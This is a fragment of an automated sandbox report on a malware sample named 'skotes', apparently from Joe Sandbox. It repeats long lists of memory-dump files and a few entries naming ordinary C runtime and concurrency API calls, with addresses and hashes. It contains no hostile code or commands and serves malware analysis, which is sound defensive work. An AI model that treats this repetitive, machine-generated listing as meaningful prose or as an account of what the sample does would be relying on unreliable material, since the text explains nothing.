                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1475861073-0
                                                                                                                                                                                            • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                            • Instruction ID: 210644ccdfa1d8fcd341c238873fb4243495acd62a7c8e477b715f86d32eda07
                                                                                                                                                                                            • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A313830F08B756BCF56AA786492BFE77B79F41300F0401A9D896D7342DA245D8ACBD1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00644C98
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00644D5E
                                                                                                                                                                                            • __freea.LIBCMT ref: 00644DCA
                                                                                                                                                                                              • Part of subcall function 0063B04B: RtlAllocateHeap.NTDLL(00000000,8FC8FEA1,?,?,0061D3FC,8FC8FEA1,?,00617A8B,?,?,?,?,?,?,00607465,?), ref: 0063B07E
                                                                                                                                                                                            • __freea.LIBCMT ref: 00644DD3
                                                                                                                                                                                            • __freea.LIBCMT ref: 00644DF6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                            • String ID: Zc,mc
                                                                                                                                                                                            • API String ID: 1423051803-1271613949
                                                                                                                                                                                            • Opcode ID: 9b18ace835eeca9c7e11c9b3cacab00a1dcebe1387f9574d1cf8109635a6cbdb
                                                                                                                                                                                            • Instruction ID: 2b43fdf36f42d535262f83ca42b011c4ab00bf5a9b3f3a58e90b3841848cce75
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b18ace835eeca9c7e11c9b3cacab00a1dcebe1387f9574d1cf8109635a6cbdb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1851C272A00216AFEB255F64DC82FFB36ABDF84754F194129FD04A7251EF30DC518AA4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0062DD91
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0062DDAE
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0062DE14
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0062DE29
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0062DE3B
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0062DE4B
                                                                                                                                                                                            • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0062DE74
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2885714658-0
                                                                                                                                                                                            • Opcode ID: fbf32189aadb64d33ec230b6511ee92278e7b331d1550149304dbe78cffb14d6
                                                                                                                                                                                            • Instruction ID: 13360e9e13ff463b0bb2d64319350141dd82c32880672b7c57a388aa952b6edf
                                                                                                                                                                                            • Opcode Fuzzy Hash: fbf32189aadb64d33ec230b6511ee92278e7b331d1550149304dbe78cffb14d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B41BE30A04A649ADF94FBA0A4557EC77676F11300F1844ADE8816F3C3CB358E09CF6A
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0062E7D7
                                                                                                                                                                                              • Part of subcall function 0062E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0062E577
                                                                                                                                                                                              • Part of subcall function 0062E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0062E599
                                                                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0062E854
                                                                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0062E860
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0062E86F
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0062E879
                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 0062E8AD
                                                                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0062E8B5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
